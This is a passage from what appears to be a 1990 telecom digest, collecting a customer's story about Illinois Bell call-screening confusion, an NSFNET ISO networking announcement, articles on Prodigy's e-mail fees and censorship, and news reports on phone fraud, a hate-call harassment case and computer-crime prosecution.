  6139.          Alternate Answer  (supposed to be programmed to Voice Mail;
  6140.                             another CO; another area code ╒708σ;
  6141.                             even another telco ╒Centelσ).
  6142.  
  6143.      Busy Repeat Dialing did not work on the second line (not installed) and
  6144. Alternate Answer worked (but not as I understood it would) on the first line.
  6145. Plus, I had forgotten how to add 'last call received' to the screening feature.
  6146.  
  6147.      It is 5:45 ...  business office open another fifteen minutes ...  good!  I
  6148. call 1-800-244-4444 which is IBT's idea of a new way to handle calls to the
  6149. business office.  Everyone in the state of Illinois calls it, and the calls go
  6150. wherever someone is free.  Before, we could call the business office in our
  6151. neighborhood direct ...  no longer.
  6152.  
  6153.      I call; I go on hold; I wait on hold five minutes.  Finally a rep comes on
  6154. the line, a young fellow who probably Meant Well ...
  6155.  
  6156.      After getting the preliminary information to look up my account, we begin
  6157. our conversation:
  6158.  
  6159. Me:  You see from the order the new features put on today?
  6160. Him: Yes, which ones are you asking about?
  6161. Me:  A couple questions. Explain how to add the last call received to
  6162.      your call screening.
  6163. Him: Call screening? Well, that's not available in your area yet. You
  6164.      see, it will be a few months before we offer it.
  6165. Me:  Wait a minute!  It was quoted to me two days ago, and it is on
  6166.      the order you are reading now is it not?
  6167.      ╒I read him the order number to confirm we had the same one.σ
  6168.  
  6169. Him: Yes, it is on here, but it won't work. No matter what was written
  6170.      up. Really, I have to apologize for whoever would have taken your
  6171.      order and written it there.
  6172.  
  6173. Me:  Hold on, hold on!  It *is* installed, and it *is* working! I want
  6174.      to know how to work it.
  6175.  
  6176. Him: No it is not installed. The only features we can offer you at
  6177.      at this time are Busy Redial and Auto Callback. Would you like me
  6178.      to put in an order for those?
  6179.  
  6180. Me:  Let's talk to the supervisor instead.
  6181.  
  6182. Him: (in a huff) Gladly sir.
  6183.  
  6184. Supervisor comes on line and repeats what was said by the rep: Call
  6185. Screening is not available at this time in Chicago-Rogers Park.
  6186.  
  6187. At this point I am furious ...
  6188.  
  6189. Me:  Let me speak to the rep who took this order (I quoted her by
  6190.      name.)
  6191.  
  6192. Supervisor: I never heard of her. She might be in some other office.
  6193.  
  6194. Me: (suspicious) Say, is this Irving-Kildare?
  6195.  
  6196. Supervisor: No! Of course not! I am in Springfield, IL.
  6197.  
  6198. Me: Suppose you give me the name of the manager at Irving-Kildare
  6199. then, and I will call there tomorrow. (By now it was 6 PM; the
  6200. supervisor was getting figity and nervous wanting to go home.)
  6201.  
  6202. Supervisor: Here! Call this number tomorrow and ask for the manager of
  6203.             that office, 1-800-244-4444.
  6204.  
  6205. Me:  Baloney! Give me the manager's direct number!
  6206.  
  6207. Supervisor: Well okay, 312-xxx-xxxx, and ask for Ms. XXXX.
  6208.  
  6209. Me: (suspicious again) She is the manager there?
  6210.  
  6211. Supervisor: Yes, she will get you straightened out. Goodbye!
  6212.  
  6213.      Comes Friday morning, I am on the phone a few minutes before 9 AM, at the
  6214. suggested direct number.  Ms.  XXXX reviewed the entire order and got the Busy
  6215. Repeat Dial feature added to line two ...  but she insisted the original rep
  6216. was 'wrong for telling you call screening was available ..' and the obligatory
  6217. apology for 'one of my people who mislead you'.  I patiently explained to her
  6218. also that in fact call screening was installed and was working.
  6219.  
  6220. Manager:  Oh really? Are you sure?
  6221.  
  6222. Me:  I am positive. Would you do me a favor? Call the foreman and have
  6223.      him call me back.
  6224.  
  6225. Manager: Well, someone will call you later.
  6226.  
  6227.      Later that day, a rep called to say that yes indeed, I was correct.  It
  6228. seems they had not been told call screening was now available in my office.  I
  6229. told her that was odd, considering the rep who first took the order knew all
  6230. about it.
  6231.  
  6232.      I asked when the Alternate Answer 'would be fixed' (bear in mind I thought
  6233. it would work outside the CO, which it would not, which is why it kept ringing
  6234. through to me instead of forwarding.)
  6235.  
  6236. She thought maybe the foreman could figure that out.
  6237.  
  6238.      Maybe an hour later, a techician did call me to say he was rather
  6239. surprised that call screening was working on my line.  He gave a complete and
  6240. concise explanation of how Alternate Answer and Transfer on Busy/No Answer was
  6241. to work.  He offered to have it removed from my line since it would be of no
  6242. value to me as configured.
  6243.  
  6244.      One question he could not answer:  How do you add the last call received
  6245. to call screening?  He could find the answer nowhere, but said he would see to
  6246. it I got 'the instruction booklet' in the mail soon, so maybe I could figure it
  6247. out myself.
  6248.  
  6249.      I got busy with other things, and put the question aside ...  until early
  6250. Saturday morning when I got one of my periodic crank calls from the same number
  6251. which has plagued me for a couple months now with ring, then hangup calls on an
  6252. irregular basis.
  6253.  
  6254.      For the fun of it, I punched *69, and told the sassy little girl who
  6255. answered the phone to quit fooling around.  She was, to say the least,
  6256. surprised and startled by my call back.  I don't think I will hear from her
  6257. again.  :)
  6258.  
  6259.      But I decided to ask again how to add such a number to call screening,
  6260. so I called Repair Service.
  6261.  
  6262.      The Repair Service clerk pulled me up on the tube *including the work
  6263. order from two days earlier* and like everyone else said:
  6264.  
  6265. Repair:  You don't have Call Screening on your line. That is not
  6266.          available yet in your area. We are adding new offices daily,
  6267.          blah, blah.
  6268.  
  6269.      I *couldn't believe* what I was hearing ...  I told her I did, and she
  6270. insisted I did not ...  despite the order, despite what the computer said.
  6271. Finally it was on to her supervisor, but as it turned out, her supervisor was
  6272. the foreman on duty for the weekend.  Like the others, he began with apologies
  6273. for how I 'had been misinformed' ...  no call screening was available.
  6274.  
  6275. Me:  Tell ya what. You say no, and I say yes. You're on the test
  6276.      board, no?  I'll hang up. You go on my line, dial *60, listen to
  6277.      the recording you hear, then call me back. I will wait here. Take
  6278.      your time. When you call back, you can apologize.
  6279.  
  6280. Foreman: Well, I'm not on the test board, I'm in my office on my own
  6281.      phone.
  6282.  
  6283. Me:  So go to the test board, or pick me up in there wherever it is
  6284.      handy and use my line. Make a few calls. Add some numbers to the
  6285.      call screening; then call me back with egg on your face, okay?
  6286.  
  6287. Foreman: Are you saying call screening is on your line and you have
  6288.      used it?
  6289.  
  6290. Me:  I have used it.  Today. A few minutes ago I played with it.
  6291.  
  6292. Foreman: I'll call you back.
  6293.  
  6294. (Fifteen minutes later) ...
  6295.  
  6296.  
  6297. Foreman:  Mr. Townson!  Umm ... I have been with this company for 23
  6298.      years.  I'll get to the point: I have egg on my face. Not mine
  6299.      really, but the company has the egg on the face. You are correct;
  6300.      your line has call screening.
  6301.  
  6302. Me:  23 years you say?  Are you a member of the Pioneers?
  6303.  
  6304. Foreman: (surprised)  Why, uh, yes I am.
  6305.  
  6306. Me:  Fine organization isn't it ...
  6307.  
  6308. Foreman:  Yes, it certainly is.  You know of them?
  6309.  
  6310. Me:  I've heard a few things.
  6311.  
  6312. Foreman:  Look, let me tell you something. I did not know -- nor *did
  6313. anyone in this office know* that call screening was now available. We
  6314. were told it was coming, that's all.
  6315.  
  6316. Me:  You mean no one knew it was already in place?
  6317.  
  6318. Foreman:  No, apparently not ... I think you are the only customer in
  6319. the Rogers Park office who has it at this time.  Because the
  6320. assumption was it was not yet installed, the reps were told not to
  6321. take orders for it ... I do not know how your order slipped through.
  6322.  
  6323. Me:  Will you be telling others?
  6324.  
  6325. Foreman: I have already made some calls, and yes, others will be told
  6326. about this on Monday.
  6327.  
  6328. Me:  Well, you know the *81 feature to turn call screening on and off
  6329. is still not working.
  6330.  
  6331. Foreman:  I'm not surprised. After all, none of it is supposed to be
  6332. working right now.  You seem to know something about this business,
  6333. Mr. Townson.
  6334.  
  6335. Me: I guess I've picked up a few things along the way.
  6336.  
  6337.      We then chatted about the Transfer on Busy/No Answer feature.  I asked
  6338. why, if my cell phone on 312-415-xxxx had the ability to transfer calls out of
  6339. the CO and be programmed/turned on and off from the phone itself, my wire line
  6340. could not.  312-415 is out of Chicago-Congress ...  he thought it might have to
  6341. do with that office having some different generics than Rogers Park ...  but he
  6342. could not give a satisfactory answer.
  6343.  
  6344.  
  6345. Patrick Townson
  6346.  
  6347.  
  6348.  
  6349. _______________________________________________________________________________
  6350.  
  6351.  
  6352. The following article appeared in the U-M Computing Center News
  6353. (October 25, 1990, V 5, No 18, Pg 10)
  6354.  
  6355. [This article was also reprinted in TELECOM digest -DH]
  6356. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6357.  
  6358. NSFNET DEMONSTRATES INTERCONTINENTAL ISO TRANSMISSION
  6359.  
  6360. [Editor's note: The following article is reprinted, with modifications,
  6361.  from the September 1990 issue of the Link Letter (Vol 3, No 4),
  6362. published by the Merit/NSFNET backbone project]
  6363.  
  6364. At the end of September, partners in the National Science Foundation Network
  6365. (NSFNET) announced a succesful demonstration of intercontinental data
  6366. transmission using the International Standards Organization Conectionless
  6367. Network Protocol (ISO CLNP).  The international exchange of ISO CLNP packets
  6368. was demonstrated betweeen end systems at the NSFNET Network Operations Center
  6369. in Ann Arbor and in Bonn, West Germany, using the NSFNET backbone
  6370. infrastructure and the European Academic Supercomputer Initiative (EASInet)
  6371. backbone.
  6372.  
  6373. The prototype OSI implementation is intended to provide wide area connectivity
  6374. between OSI networks, including networks using the DECNet Phase V protocols.
  6375.  
  6376. The new software was integrated into the NSFNET's "packet switching" (data
  6377. transmission) nodes by David Katz and Susan Hares of the Merit Computer
  6378. Network, with support from IBM's software developement departments in Milford,
  6379. CT and Yorktown Heights, NY.
  6380.  
  6381. NSFNET is the first federally supported computer network to acheive
  6382. international ISO CLNP transmission on an operating network, according to
  6383. Merit's Hans-Werner Braun, Principle Investigator for the NSFNET Project.
  6384.  
  6385. The Prototype ISO implementation is being designed to coexist with NSFNET's
  6386. operational Internet Protocol (IP) network, and is a significant step towards
  6387. offering ISO services on the NSFNET backbone.  Eric Aupperle, President of
  6388. Merit and acting director of ITD Network Systems, says that "the demonstration
  6389. shows that we're capable of transporting ISO traffic.  Now we're working to
  6390. deploy this experimental service as fast as possible."
  6391.  
  6392. An implementation of CLNP was first demonstrated by Merit/NSFNET staff at the
  6393. InterOp '89 conference.  That implementation of CLNP was originally developed
  6394. as part of the ARGO project at the University of Wisconsin, Madision, with the
  6395. support of the IBM Corporation.
  6396.  
  6397. by Ken Horning
  6398. DTD Network Systems.
  6399. _______________________________________________________________________________
  6400.  
  6401.  
  6402. {Middlesex News}, Framingham, Mass., 11/2/90
  6403.  
  6404. Prodigy Pulls Plug on Electronic Mail Service For Some
  6405.  
  6406. By Adam Gaffin
  6407.  
  6408. NEWS STAFF WRITER
  6409.  
  6410. Users of a national computer network vow to continue a protest against
  6411. censorship and a new charge for electronic mail even though the company kicked
  6412. them off-line this week.
  6413.  
  6414. Brian Ek, spokesman for the network, Prodigy, said the "handful" of users had
  6415. begun harassing other users and advertisers on the service and that some had
  6416. even created programs "to flood members' 'mailboxes' with (thousands of)
  6417. repeated and increasingly strident harangues," he said.
  6418.  
  6419. But leaders of the protest say they sent only polite letters -- approved by the
  6420. company's legal department -- using techniques taught by the company itself.
  6421. Up to nine of them had their accounts pulled hips week.
  6422.  
  6423. Protests began in September when the company said it would cut unlimited
  6424. electronic mail from its monthly fee -- which includes such services as on-line
  6425. airline reservations, weather and games -- and would charge 25 cents for every
  6426. message above a monthly quota of 30.  Ek says the design of the Prodigy network
  6427. makes "e-mail" very expensive and that few users send more than 30 messages a
  6428. month.
  6429.  
  6430. But Penny Hay, the only organizer of the "Cooperative Defense Committee" whose
  6431. account was not shut this week, said she and others are upset with Prodigy's
  6432. "bait and switch" tactics:  The company continues to promote "free" electronic
  6433. mail as a major feature.  She said Prodigy itself had spurred use of e-mail by
  6434. encouraging subscribers to set up private e-mail ``lists'' rather than use
  6435. public forums and that the charges will especially hurt families, because the
  6436. quota is per household, not person.
  6437.  
  6438. Ek said relatively few members protested the rate chqange.  Gary Arlen, who
  6439. publishes a newsletter about on-line services, called the controversy "a
  6440. tempest in a teapot."
  6441.  
  6442. Hay, however, said the group now has the backing of nearly 19,000 Prodigy users
  6443. -- the ones advertisers would want to see on-line because they are the most
  6444. active ones on the system and so more likely to see their ads.
  6445.  
  6446. The group is also upset with the way the company screens messages meant for
  6447. public conferences.  Other services allow users to see "postings"
  6448. immediately.
  6449.  
  6450. "They are infamous for this unpredicible and unfathomable censorship," Hay
  6451. said.
  6452.  
  6453. "We feel what we are doing is not censoring because what we are essentially
  6454. doing is electronic publishing," Ek said, comparing the public messages to
  6455. letters to the editor of a family newspaper.
  6456.  
  6457. Neil Harris, marketing director at the competing GEnie service, said many
  6458. people would feel intimidated knowing that what they write is being screened.
  6459. He said GEnie only rarely has to deleted messages.  And he said GEnie has
  6460. picked up several thousand new customers from among disgruntled Prodigy users.
  6461.  
  6462. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6463.  
  6464. "Conversations with Fred," {Middlesex News}, Framingham, 11/6/90.
  6465.  
  6466. The story is bizarre but true, swears Herb Rothman.  Seems Prodigy, the network
  6467. run as a joint venture by Sears and IBM, wouldn't let somebody post a message
  6468. in a coin-collecting forum that he was looking for a particular Roosevelt dime
  6469. for his collection.  Upset, the man called "member services." The
  6470. representative told him the message violated a Prodigy rule against mentioning
  6471. another user in a public message.  "What user?" the man asked.  "Roosevelt
  6472. Dime," the rep replied.  "That's not a person!" the man said.  "Yes he is,
  6473. he's a halfback for the Chicago Bears," the rep shot back.
  6474.  
  6475. Rothman is one of those alleged compu-terrorists Prodigy claims is harassing
  6476. other users and companies that advertise on the service by sending out
  6477. thousands upon thousands of increasingly hostile messages in protest of a
  6478. Prodigy plan to begin charging users who send more than 30 e-mail messages a
  6479. month.  Rothman and the others say they sent very polite messages to people
  6480. (Penny Hay of Los Angeles says her messages were even approved by the Prodigy
  6481. legal department) telling them about the new fees and urging them to protest.
  6482.  
  6483. What's really happening is that Prodigy is proving its complete arrogance and
  6484. total lack of understanding of the dynamics of on-line communication.  They
  6485. just don't get it.  People are NOT going to spend nearly $130 a year just to
  6486. see the weather in Oregon or order trips to Hawaii.
  6487.  
  6488. Even the computerphobes Prodigy wants to attract quickly learn the real value
  6489. of the service is in finding new friends and holding intelligent "discussions"
  6490. with others across the country.
  6491.  
  6492. But Prodigy blithely goes on censoring everything meant for public consumption,
  6493. unlike other nationwide services (or even bulletin-board systems run out of
  6494. some teenager's bedroom).  Rothman's story is not the only one about capricious
  6495. or just plain stupid censoring.  Dog fanciers can't use the word ``bitch'' when
  6496. talking about their pets, yet the service recently ran an advice column all
  6497. about oral sex.  One user who complained when a message commenting on the use
  6498. of the term "queen bitch" on "L.A.  Law" was not allowed on was told that
  6499. "queen b***h" would be acceptable, because adults would know what it meant
  6500. but the kiddies would be saved.
  6501.  
  6502. So when the supposed technology illiterates Prodigy thinks make up its user
  6503. base managed to get around this through the creation of private mail "lists"
  6504. (and, in fact, many did so at the urging of Prodigy itself!), Prodigy started
  6505. complaining of "e-mail hogs," quietly announced plans to levy charges for more
  6506. than a minute number of e-mail messages each month and finally, simply canceled
  6507. the accounts of those who protested the loudest!
  6508.  
  6509. And now we are watching history in the making, with the nation's first
  6510. nationwide protest movement organized almost entirely by electronic mail (now
  6511. don't tell Prodigy this, but all those people they kicked off quickly got back
  6512. onto the system -- Prodogy allows up to six users per household account, and
  6513. friends simply loaned their empty slots to the protest leaders).
  6514.  
  6515. It's truly amazing how little faith Prodigy has in the ability of users to
  6516. behave themselves.  Other systems have "sysops" to keep things in line, but
  6517. rarely do they have to pull messages.  Plus, Prodigy is just being plain dumb.
  6518. Rothman now has a mailing list of about 1,500.  That means every time he sends
  6519. out one of his newsletters on collectibles, he sends 1,500 e-mail messages,
  6520. which, yes, costs more for Prodigy to send over long-distance lines and store
  6521. in its central computers.  But if they realized their users are generally
  6522. mature, rather than treating them as 4-year-olds, Rothman could post just one
  6523. message in a public area, that everybody could see.
  6524.  
  6525. Is this any way to run an on-line system?  Does Prodigy really want to drive
  6526. away the people most inclined to use the service -- and see all those ads that
  6527. pop up at the bottom of the screen?  Prodigy may soon have to do some
  6528. accounting to the folks at IBM and Sears, who by most accounts have already
  6529. poured at least $750 million into "this thing."
  6530.  
  6531. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - -
  6532. With your computer and modem, you can reach Fred the Middlesex News
  6533. Computer anytime, day or night, at (508) 872-8461. Set your parameters
  6534. to 8-1-N and up to 2400 baud.
  6535.  
  6536. _______________________________________________________________________________
  6537.  
  6538.  
  6539. HEADLINE  Cops Say Hacker, 17, `Stole' Phone Service
  6540.           Byline:   By Joshua Quittner
  6541. DATE      10/31/90
  6542. SOURCE    Newsday (NDAY)
  6543.           Edition:  NASSAU AND SUFFOLK
  6544.           Section:  NEWS
  6545.           Page:     02
  6546.           (Copyright Newsday Inc., 1990)
  6547.  
  6548. State Police arrested a 17-year-old computer hacker at his terminal yesterday
  6549. afternoon, and charged the Bethpage High School student with using his computer
  6550. to run up more than $1 million worth of long-distance telephone calls on credit
  6551. card numbers he deciphered.
  6552.  
  6553. State Police Senior Investigator Donald Delaney, who supervised the
  6554. investigation and arrest of John Farrell, of 83 S.  Third St., said that the
  6555. case was among the first to rely on new technology developed by
  6556. telecommunications engineers to track long-distance telephone-service abusers.
  6557.  
  6558. Investigators believe that as early as December, 1989, Farrell was using his
  6559. computer and a homemade electronic device, known as a black box, to
  6560. sequentially dial telephone numbers, which double as credit card numbers.  By
  6561. automatically calling the numbers in sequence, Farrell hoped to trigger a
  6562. signal indicating a valid credit card number.
  6563.  
  6564. However, AT&T, which recently developed software to detect such sequential
  6565. dialing, alerted Delaney's office in September of Farrell's alleged attempts.
  6566. In July, investigators surreptitiously placed a "pen register" - a device that
  6567. records all numbers dialed from a particular phone line - on Farrell's
  6568. telephone, Delaney said.
  6569.  
  6570. State Police and U.S.  Secret Service agents - the federal agency has been
  6571. taking an active part in computer crimes and investigates credit card fraud -
  6572. staked out Farrell's house yesterday afternoon.  Shortly after 3 p.m., when the
  6573. youth arrived home from school, technicians monitoring his telephone line
  6574. signaled the police that he had already turned on his computer and was using an
  6575. illegal credit card number to access an electronic bulletin board in Illinois,
  6576. police said.  Officers, armed with a search warrant, then entered the house and
  6577. arrested Farrell.
  6578.  
  6579. Delaney said Farrell found over 100 long-distance credit card numbers, from
  6580. four long-distance carriers, and posted them on rogue electronic bulletins
  6581. boards in Virginia, Chicago, Denmark and France.  Although he allegedly made
  6582. most of the illegal calls, other hackers also used the numbers.  The majority
  6583. of the calls - more than $600,000 worth - were billed to four corporate card
  6584. numbers, said Delaney, who added that the phone company is responsible for such
  6585. losses.  Farrell was arrested and charged with six felonies, including grand
  6586. larceny, computer trespass and criminal possession of stolen property.  The
  6587. charges carry a maximum penalty of four years in prison.  He was released into
  6588. the custody of his parents last night.  Neither Farrell nor his parents could
  6589. be reached for comment yesterday.  Farrell was associated with a group of
  6590. hackers who called themselves Paradox, Delaney said.
  6591.  
  6592. _______________________________________________________________________________
  6593.  
  6594.  
  6595. HEADLINE  Menacing calls started out as prank, says participant
  6596.           Byline:   Katharine Webster and Graciella Sevilla
  6597.           Credit:   Staff Writer
  6598.           Notes:    Editions vary : Head varies
  6599. DATE      10/28/90
  6600. SOURCE    The San Diego Union and Tribune (SDU)
  6601.           Pub:      UNION
  6602.           Edition:  1,2,3,4,5,6
  6603.           Section:  LOCAL
  6604.           Page:     B-1
  6605.           (Copyright 1990)
  6606.  
  6607. A three-year campaign of telephoned threats and ethnic slurs directed against
  6608. the Jewish owner of a National City pawn shop started out as a "stupid prank"
  6609. that grew to include more than 100 people, according to one of the young men
  6610. who participated in the harassment.  "Little did I know when I started this
  6611. three years ago, that it would escalate into my brother calling (David Vogel)
  6612. 10 times a day," said Gary Richard Danko, 21, of Chula Vista, who cooperated
  6613. with the FBI investigation that resulted in the indictment Wednesday of his
  6614. older brother and two other men on civil rights charges.
  6615.  
  6616. Michael Dennis Danko, 23, and Brett Alan Pankauski, 22, both of Chula Vista,
  6617. and Jeffrey Alan Myrick, 21, of Paradise Hills in San Diego, pleaded not guilty
  6618. in U.S.  District Court yesterday to a six-count indictment charging them with
  6619. wire fraud and felony conspiracy to violate the civil rights of David Vogel, a
  6620. 66-year-old Jewish immigrant who escaped the Holocaust.
  6621.  
  6622. Pankauski was released on $10,000 bail and admonished to avoid all contact with
  6623. Vogel.  But Danko and Myrick were held without bail pending an Oct.  4
  6624. detention hearing after federal prosecutor Michael McAuliffe convinced
  6625. Magistrate Irma Gonzalez that they posed substantial flight risks.
  6626.  
  6627. On Wednesday, Gary Danko and a friend, Robert John Byrd, 21, also of Chula
  6628. Vista, pleaded guilty to one misdemeanor count of conspiring to violate Vogel's
  6629. civil rights, according to a spokesman for the U.S.  attorney's office.  The
  6630. two friends, who met while working at a 7-Eleven, were released and agreed to
  6631. testify at the trial of the remaining three defendants.
  6632.  
  6633. Though the arrests climaxed a five-month investigation involving the FBI, U.S.
  6634. attorney's office and the Department of Justice, Gary Danko said yesterday that
  6635. the menacing phone calls to numbers picked "at random" from the telephone book
  6636. began years ago.
  6637.  
  6638. The group of friends, most of whom have known each other since elementary
  6639. school, all used to make crank phone calls, Danko said, even to each other.
  6640. They also experimented with breaking codes for answering machines and changing
  6641. the outgoing message to something profane.
  6642.  
  6643. While he said he stopped making the calls to Vogel a couple of years ago, his
  6644. brother and others "took it out to a degree to torment the guy."
  6645.  
  6646. "I feel bad that it turned out this way," Danko said.  "I wish there was some
  6647. way I could make it up to David (Vogel)."
  6648.  
  6649. "I know how he feels," Danko added.  "Ever since I've had my own phone line
  6650. I've had harassing phone calls between 2 and 6 in the morning to the point
  6651. where I've changed my phone number three times." Danko denied that he, his
  6652. brother, or any of the other defendants in the case were racists or that they
  6653. had targeted Vogel for any particular reason.  He said that the defendants made
  6654. crank calls to many people, and that the anti-Jewish nature of the calls to
  6655. Vogel was probably based on a "lucky guess" that he was Jewish.
  6656.  
  6657. According to the indictment, Michael Danko, Myrick, and Pankauski made phone
  6658. calls in which they referred to Nazi concentration camps and Hitler, while
  6659. threatening to harm Vogel and his pawn-shop business.
  6660.  
  6661. Vogel said he began receiving the phone calls -- which included racial slurs
  6662. and taunts about his wife -- in 1987.  Sometimes he received up to 12 calls a
  6663. day, creating a "personal hell." Earlier this year, he finally hired a private
  6664. investigator, who then turned the case over to the FBI.
  6665.  
  6666. "It caused suffering for us like the concentration camps did for my family,"
  6667. Vogel said.  "It was horrible."
  6668.  
  6669. Another relative of Gary and Michael Danko, who asked not to be identified,
  6670. said he thought the calls to Vogel continued only "because they got a reaction
  6671. out of him -- he screamed and yelled at them." But he said Vogel was probably
  6672. not the only Jew targeted in the phone calls.
  6673.  
  6674. The relative agreed with FBI agents, who described these incidents as isolated
  6675. and not connected with organized racist groups such as the Skinheads.
  6676.  
  6677. Instead, he said, the brothers thought they were doing "something funny." He
  6678. said he thought they still didn't realize they were doing something wrong, even
  6679. though he had "yelled and screamed at them" to stop.
  6680.  
  6681. Gary Danko is a computer "hacker" who works at a computer store, he said.
  6682. Michael Danko was unemployed.
  6683.  
  6684. FBI agents began investigating the calls in May, when they placed a tape
  6685. recorder on Vogel's phone.  It only took a few moments before the first hate
  6686. call came in.
  6687.  
  6688. Agents traced the calls to a number of phone booths and then began putting
  6689. together the wire-fraud case.
  6690.  
  6691. In addition to the civil rights violations, the indictment alleges that the
  6692. three defendants conspired to obtain unauthorized AT&T long-distance access
  6693. codes to make long-distance phone calls without paying for them.
  6694.  
  6695. If convicted of the civil rights and wire-fraud charges, the defendants could
  6696. face up to 15 years in prison and $500,000 in fines.  In addition, they face
  6697. various additional charges of illegally obtaining and using the restricted
  6698. long-distance access codes.
  6699.  
  6700. Yesterday, Vogel angrily rejected the notion that these callers were less than
  6701. serious in their intentions.
  6702.  
  6703. "They're full of baloney.  They don't know what they are talking about," he
  6704. said.
  6705.  
  6706. _______________________________________________________________________________
  6707.  
  6708. HEADLINE  SHORT-CIRCUITING DATA CRIMINALS
  6709.           STEPS CAN BE TAKEN TO DETECT AND PREVENT COMPUTER SECURITY BREACHES,
  6710.           BUT BUSINESSES HESITATE TO PROSECUTE
  6711.           Byline:   Mary J. Pitzer Daily News Staff Writer
  6712.           Notes:    MONDAY BUSINESS: COVER STORY THE PRICE OF COMPUTER
  6713.           CRIME. Second of two parts
  6714. DATE      10/22/90
  6715. SOURCE    LOS ANGELES DAILY NEWS   (LAD)
  6716.           Edition:  Valley
  6717.           Section:  BUSINESS
  6718.           Page:     B1
  6719.           (Copyright 1990)
  6720.  
  6721. Along with other telecommunications companies, Pacific Bell is a favorite
  6722. target for computer crime.
  6723.  
  6724. "We're a victim," said Darrell Santos, senior investigator at Pacific Bell.
  6725. "We have people hacking us and trying to get into our billables.  It seems like
  6726. a whole lot of people are trying to get into the telecommunications network."
  6727.  
  6728. But the company is fighting back.  About seven employees in its investigative
  6729. unit work with different law enforcement agencies to track down criminals, many
  6730. of whom use the phone lines to commit computer crimes.
  6731.  
  6732. In cooperation with authorities Pacific Bell investigators collect evidence,
  6733. trace calls, interview suspects and testify in court.  They even do their own
  6734. hacking to figure out what some of their chief adversaries are up to.
  6735.  
  6736. "We take a (telephone) prefix and hack the daylights out of it.  We hack our
  6737. own numbers," Santos said.  "Hey, if we can do it, think of what those brain
  6738. childs are doing."
  6739.  
  6740. Few companies are nearly so aggressive.  For the most part computer crime is a
  6741. growing business that remains relatively unchecked.  State and federal laws
  6742. against computer crime are in place, but few cases are prosecuted.  Most
  6743. incidents go unreported, consultants say.
  6744.  
  6745. "We advise our clients not to talk about losses and security because just
  6746. talking about them in public is a breach," said Donn Parker, a senior managment
  6747. consultant at SRI International in Palo Alto.  "Mostly companies handle
  6748. incidents privately or swallow the loss."
  6749.  
  6750. Most problematic is that few companies have tight enough security to protect
  6751. themselves.
  6752.  
  6753. "On a scale of one to 10, the majority of companies are at about a two," said
  6754. Jim Harrigan, senior security consultant at LeeMah Datacom Security Corp.,
  6755. which sells computer security products.
  6756.  
  6757. Current laws are strong enough to convict computer criminals, security experts
  6758. say.  But they have been little used and sentences are rarely stiff, especially
  6759. because so many violators are juveniles.
  6760.  
  6761. Fewer than 250 computer crime cases have been prosecuted nationally, according
  6762. to Kenneth Rosenblatt, head of the Santa Clara County district attorney's high
  6763. technology unit.  Rosenblatt co-authored California's recent computer crime
  6764. law, which creates new penalties such as confiscation of computer equipment.
  6765.  
  6766. Under a strengthened federal Computer Fraud and Abuse Act, Cornell University
  6767. graduate student Robert T.  Morris Jr.  was convicted of unleashing a computer
  6768. virus in Internet, a large computer network tying universities and government
  6769. facilities.  Though the virus was not intended to destroy programs, it infected
  6770. thousands of computers and cost between $100,000 and $10 million to combat,
  6771. according to author and hacking expert Cliff Stoll.
  6772.  
  6773. Morris was sentenced to three years probation and a $10,000 fine.
  6774.  
  6775. A major problem in policing computer crime is that investigators are
  6776. understaffed and undertrained, Rosenblatt said.  While Los Angeles and other
  6777. police departments have computer crime units, most are not geared for it, he
  6778. said.  And violent crimes take precedence.
  6779.  
  6780. Rosenblatt would like to see greater regional cooperation and coordination
  6781. among local law enforcement agencies.
  6782.  
  6783. Because investigators are understaffed, they must depend on their victims to
  6784. gather enough evidence to convict the culprits.  And that can be fraught with
  6785. difficulties, Kenneth Weaver, criminal investigator in the San Diego district
  6786. attorney's office, said at a recent security conference in Newport Beach.
  6787.  
  6788. In one case a company's computer system crashed and its programs were erased 30
  6789. days after an employee left the firm.  With six months of backup tapes, the
  6790. company was able to document what had happened.  The District Attorney's office
  6791. asked to estimate how much money had been lost.
  6792.  
  6793. The total came to $3,850, well below the $5,000 in damages needed for a felony
  6794. case, Weaver said.  And then the information was delayed 14 months.  It needed
  6795. to be reported in 12 months for the D.A.  to go forward with the case.
  6796.  
  6797. "We were prevented from prosecuting," Weaver said.  In California, 71 percent
  6798. of the cases result in convictions once arrests are made, according to the
  6799. National Center for Computer Crime Data.
  6800.  
  6801. But when prosecutors do make a case, there can be more trouble.  Some prominent
  6802. people in the computer industry have complained that a 2-year investigation by
  6803. the U.S.  Secret Service infringed on civil rights.
  6804.  
  6805. The investigation, code-named Operation Sun Devil, was started to snare members
  6806. of the Legion of Doom, an elite hacker group.  The Secret Service suspected
  6807. that they had broken into BellSouth Corp.'s telephone network and planted
  6808. destructive programs that could have knocked out emergency and customer phone
  6809. service across several states.  Last spring, hacker dens in 13 cities were
  6810. raided.  Two suspects have been charged with computer crimes, and more arrests
  6811. are expected.
  6812.  
  6813. But a group called EFF, formed in July by Lotus Development Corp.  founder
  6814. Mitchell D.  Kapor and Apple Computer Inc.  co-founder Stephen Wozniak, has
  6815. objected to the crackdown as overzealous.
  6816.  
  6817. "The excesses of Operation Sun Devil are only the beginning of what threatens
  6818. to become a long, difficult, and philosophically obscure struggle between
  6819. institutional control and individual liberty," Kapor wrote in a paper with
  6820. computer expert and Grateful Dead lyricist John Perry Barlow.
  6821.  
  6822. So far, the foundation has granted $275,000 to Computer Professionals for
  6823. Social Responsibility to expand its ongoing work on civil liberties protections
  6824. for computer users.
  6825.  
  6826. The foundation also is offering legal assistance to computer users who may have
  6827. had their rights infringed.  For example, it provided legal support to Craig
  6828. Neidorf, publisher of an online hacking "magazine." Neidorf had been charged
  6829. with felony wire fraud and interstate transportation of stolen property for
  6830. publishing BellSouth network information.
  6831.  
  6832. Neidorf said he was not aware the information was stolen.  EFF claimed that
  6833. Neidorf's right to free speech had been violated.  The government dropped its
  6834. case after EFF representatives found that the apparently stolen information was
  6835. publicly available.
  6836.  
  6837. Companies that want to prosecute computer crime face other dilemmas.
  6838.  
  6839. "The decision to bring in public authorities is not always the best," said
  6840. Susan Nycum, an attorney at Baker & McKenzie in Palo Alto.
  6841.  
  6842. In a criminal case, the company loses control over what information is made
  6843. public in the trial.  But companies can pursue civil remedies that enable them
  6844. to keep a lower profile.  Suing for theft of trade secret, for example, would
  6845. be one avenue, Weaver said.
  6846.  
  6847. Many companies are reluctant to beef up security even if they know the risks
  6848. from computer crime.  First, they worry that making access to computers more
  6849. difficult would lower productivity.  There also is concern that their technical
